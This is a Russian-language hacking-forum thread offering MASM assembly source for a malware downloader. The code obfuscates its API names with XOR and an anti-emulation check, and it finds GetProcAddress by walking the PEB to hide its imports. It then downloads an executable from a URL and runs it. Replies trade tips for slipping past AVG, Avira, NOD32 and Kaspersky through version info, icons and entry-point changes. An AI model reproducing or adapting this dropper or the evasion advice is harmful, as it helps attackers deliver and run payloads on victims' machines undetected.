1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Downloader *Masm*

Тема в разделе "Исходные коды", создана пользователем steal, 20 июл 2016.

Метки:
  1. TopicStarter Overlay
    steal

    steal

    Регистрация:
    28 июн 2016
    Сообщения:
    17
    Симпатии:
    4
    Если использовать в качестве диска рандом, но он должен быть в системе (нехуя не диск С:) палево сокращеается

    ксор кода мне не могает избавиться от всего, и вот вам исходник:

    Код:
    .386
    .model flat, stdcall
    option casemap :none
    
    include \masm32\include\windows.inc
    include \masm32\macros\no_.asm
    include \masm32\macros\macros.asm
    
    uselib kernel32, user32
    
    
    .code
    blablablasupercrypt PROC data:DWORD
    LOCAL buf[16]:BYTE
    
      invoke lstrlen, data
      mov esi, data
      mov edi, eax
    
      goniggago:
      .if edi > 0
        invoke SetLastError,0
        invoke QueryDosDevice, chr$("D:"), addr buf, 10
    
        .if eax == 0
          invoke GetLastError
          and al,0Fh
          dec al
          xor byte ptr [esi],al
          inc esi
          dec edi
          jmp goniggago
        .endif
      .endif
    
      mov eax, data
    ret
    blablablasupercrypt ENDP
    
    start PROC
      LOCAL sasayhuy:DWORD
    
      yes_call_prepare
    
    .data
    fname db "\[EMf~gefhm]fO`elH",0
    .code
    
      mov sasayhuy, FUNC(blablablasupercrypt,offset fname)
      yes_invoke_load sasayhuy, chr$("urlmon.dll"), 0, chr$("http://www.rarlab.com/rar/wrar540b3ru.exe?23"), chr$("temp.exe"), 0, 0
    
      mov sasayhuy, FUNC(blablablasupercrypt,chr$("ZaleeLqlj|}lH"))
      yes_invoke_load sasayhuy, chr$("shell32.dll"), 0, chr$("open"), chr$("temp.exe"), 0, 0, SW_SHOWNORMAL
    
    
      invoke ExitProcess, 0
    start ENDP
    end start
    а теперь ещё и модуль:

    Код:
    UNICODE_STRING STRUCT
        xLength dw ?
        MaximumLength dw ?
        Buffer dd ?
    UNICODE_STRING ENDS
    PEB_LDR_DATA STRUCT 4
        xLength dd ?
        Initialized db ?
        SsHandle dd ?
        InLoadOrderModuleList LIST_ENTRY <>
        InMemoryOrderModuleList LIST_ENTRY <>
        InInitializationOrderModuleList LIST_ENTRY <>
    PEB_LDR_DATA ENDS
    PEB STRUCT
        InheritedAddressSpace db ?
        ReadImageFileExecOptions db ?
        BeingDebugged db ?
        Spare db ?
        Mutant dd ?
        ImageBaseAddress dd ?
        LoaderData dd ?
        ProcessParameters dd ?
        SubSystemData dd ?
        ProcessHeap dd ?
        FastPebLock dd ?
        FastPebLockRoutine dd ?
        FastPebUnlockRoutine dd ?
        EnvironmentUpdateCount dd ?
        KernelCallbackTable dd ?
        EventLogSection dd ?
        EventLog dd ?
        FreeList dd ?
        TlsExpansionCounter dd ?
        TlsBitmap dd ?
        TlsBitmapBits dd 2 dup(?)
        ReadOnlySharedMemoryBase dd ?
        ReadOnlySharedMemoryHeap dd ?
        ReadOnlyStaticServerData dd ?
        AnsiCodePageData dd ?
        OemCodePageData dd ?
        UnicodeCaseTableData dd ?
        NumberOfProcessors dd ?
        NtGlobalFlag dd ?
        Spare2 db 4 dup(?)
        CriticalSectionTimeout dq ?
        HeapSegmentCommit dd ?
        HeapDeCommitTotalFreeThreshold dd ?
        HeapDeCommitFreeBlockThreshold dd ?
        NumberOfHeaps dd ?
        MaximumNumberOfHeaps dd ?
        ProcessHeaps dd ?
        GdiSharedHandleTable dd ?
        ProcessStarterHelper dd ?
        GdiDCAttributeList dd ?
        LoaderLock dd ?
        OSMajorVersion dd ?
        OSMinorVersion dd ?
        OSBuildNumber dd ?
        OSPlatformId dd ?
        ImageSubSystem dd ?
        ImageSubSystemMajorVersion dd ?
        ImageSubSystemMinorVersion dd ?
        GdiHandleBuffer dd 22h dup(?)
        PostProcessInitRoutine dd ?
        TlsExpansionBitmap dd ?
        TlsExpansionBitmapBits db 80h dup(?)
        SessionId dd ?
    PEB ENDS
    LDR_MODULE STRUCT
        InLoadOrderModuleList LIST_ENTRY <>
        InMemoryOrderModuleList LIST_ENTRY <>
        InInitializationOrderModuleList LIST_ENTRY <>
        BaseAddress dd ?
        EntryPoint dd ?
        SizeOfImage dd ?
        FullDllName UNICODE_STRING <>
        BaseDllName UNICODE_STRING <>
        Flags dd ?
        LoadCount dw ?
        TlsIndex dw ?
        HashTableEntry LIST_ENTRY <>
        TimeDateStamp dd ?
    LDR_MODULE ENDS
    xinvoke MACRO name:REQ, params:VARARG
        count = 0
        FOR xparam, <params>
          count = count + 1
          @CatStr(var,%count) TEXTEQU @CatStr(&xparam)
        ENDM
        REPEAT count
          IF @SizeStr(%@CatStr(var,%count)) GT 4
            IFIDNI @SubStr(%@CatStr(var,%count), 1, 4),<addr>
              __temp_text TEXTEQU @SubStr(%@CatStr(var,%count), 5)
              lea eax, __temp_text
              push eax
            ELSE
              push @CatStr(var,%count)
            ENDIF
          ELSE
            push @CatStr(var,%count)
          ENDIF
          count = count - 1
        ENDM
        mov eax, name
        call eax
    ENDM
    yes_invoke_load MACRO funcname:REQ, libname:REQ, params:VARARG
        count = 0
        _addr_found = 0
        _eax_found = 0
        FOR xparam, <params>
          IFIDNI <&xparam>,<eax>
            _eax_found = 1
          ENDIF
          count = count + 1
          @CatStr(var,%count) TEXTEQU @CatStr(&xparam)
        ENDM
        REPEAT count
          IF @SizeStr(%@CatStr(var,%count)) GT 4
            IFIDNI @SubStr(%@CatStr(var,%count), 1, 4),<addr>
              __temp_text TEXTEQU @SubStr(%@CatStr(var,%count), 5)
              lea eax, __temp_text
              push eax
              _addr_found = 1
            ELSE
              push @CatStr(var,%count)
            ENDIF
          ELSE
            push @CatStr(var,%count)
          ENDIF
          count = count - 1
        ENDM
        IF _addr_found EQ 1
          IF _eax_found EQ 1
            %ECHO [Line]
          ENDIF
        ENDIF
        xinvoke _LoadLibraryAFunc, libname
        xinvoke _GetProcAddressFunc, eax, funcname
        call eax
    ENDM
    yes_invoke MACRO funcname:REQ, libname:REQ, params:VARARG
        count = 0
        _addr_found = 0
        _eax_found = 0
        FOR xparam, <params>
          IFIDNI <&xparam>,<eax>
            _eax_found = 1
          ENDIF
          count = count + 1
          @CatStr(var,%count) TEXTEQU @CatStr(&xparam)
        ENDM
        REPEAT count
          IF @SizeStr(%@CatStr(var,%count)) GT 4
            IFIDNI @SubStr(%@CatStr(var,%count), 1, 4),<addr>
              __temp_text TEXTEQU @SubStr(%@CatStr(var,%count), 5)
              lea eax, __temp_text
              push eax
              _addr_found = 1
            ELSE
              push @CatStr(var,%count)
            ENDIF
          ELSE
            push @CatStr(var,%count)
          ENDIF
          count = count - 1
        ENDM
        IF _addr_found EQ 1
          IF _eax_found EQ 1
            %ECHO [used]
          ENDIF
        ENDIF
        xinvoke _GetModuleHandleA, libname
        xinvoke _GetProcAddressFunc, eax, funcname
        call eax
    ENDM
    yes_call_prepare MACRO
        .data?
            _GetProcAddressFunc dd ?
            _LoadLibraryAFunc dd ?
            _GetModuleHandleA dd ?
            _krnl dd ?
        .code
            assume fs:nothing
            mov eax, fs:[30h]
            mov eax, PEB.LoaderData[eax]
            mov eax, PEB_LDR_DATA.InLoadOrderModuleList[eax]
            mov eax, LDR_MODULE.InLoadOrderModuleList[eax]
            mov eax, LDR_MODULE.InLoadOrderModuleList[eax]
            mov eax, LDR_MODULE.BaseAddress[eax]
            mov edx, eax
            mov _krnl, eax
            add eax, IMAGE_DOS_HEADER.e_lfanew
            mov eax, [eax]
            add eax, edx
            add eax, IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress
            mov eax, [eax]
            add eax, edx
            mov edi, eax
            add eax, IMAGE_EXPORT_DIRECTORY.AddressOfNames
            mov eax, [eax]
            add eax, edx
            xor esi, esi
            __find:
                push eax
                mov eax, [eax]
                add eax, edx
                mov ebx, chr$("GetProcAddress")
                __compare:
                    mov cl, [eax]
                    mov ch, [ebx]
                    test cl, cl
                    jz __test_ch
                    test ch, ch
                    jz __next
                    jmp __check
                    __test_ch:
                        test ch, ch
                        jz __found
                        jmp __next
                    __check:
                        cmp cl,ch
                        jne __next
                        inc eax
                        inc ebx
                        jmp __compare
            __next:
                inc esi
                pop eax
                add eax,4
                jmp __find
            __found:
            pop eax
            mov eax, edi
            add eax, IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
            mov eax, [eax]
            add eax, edx
            add eax, esi
            add eax, esi
            mov bx, [eax]
            movzx ebx, bx
            mov eax, edi
            add eax, IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
            mov eax, [eax]
            add eax, edx
            add ebx, ebx
            add eax, ebx
            add eax, ebx
            mov eax, [eax]
            add eax, edx
            mov _GetProcAddressFunc, eax
            xinvoke _GetProcAddressFunc, _krnl, chr$("LoadLibraryA")
            mov _LoadLibraryAFunc, eax
            xinvoke _GetProcAddressFunc, _krnl, chr$("GetModuleHandleA")
            mov _GetModuleHandleA, eax
            assume fs:error
    ENDM
    ДАЙТЕ ДОРЕДАКТИРОВАТЬ
     
    Метки:
  2. TopicStarter Overlay
    steal

    steal

    Регистрация:
    28 июн 2016
    Сообщения:
    17
    Симпатии:
    4
    Но там AVG и Avira убираются через Version Info + ico
    нод32 я так и не смог убрать
     
  3. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    А каспер?
     
  4. TopicStarter Overlay
    steal

    steal

    Регистрация:
    28 июн 2016
    Сообщения:
    17
    Симпатии:
    4
    EP смени + call me call )
     
  5. Demicoeur

    Demicoeur

    Регистрация:
    4 янв 2016
    Сообщения:
    7
    Симпатии:
    1
    Хмм... нагло спижжено у Kaimi.... хоть антиэмуль бы сменил....
     
  6. TopicStarter Overlay
    steal

    steal

    Регистрация:
    28 июн 2016
    Сообщения:
    17
    Симпатии:
    4
    честно проверено и выложено. хочешь сменить - вперёд
     

Поделиться этой страницей

Загрузка...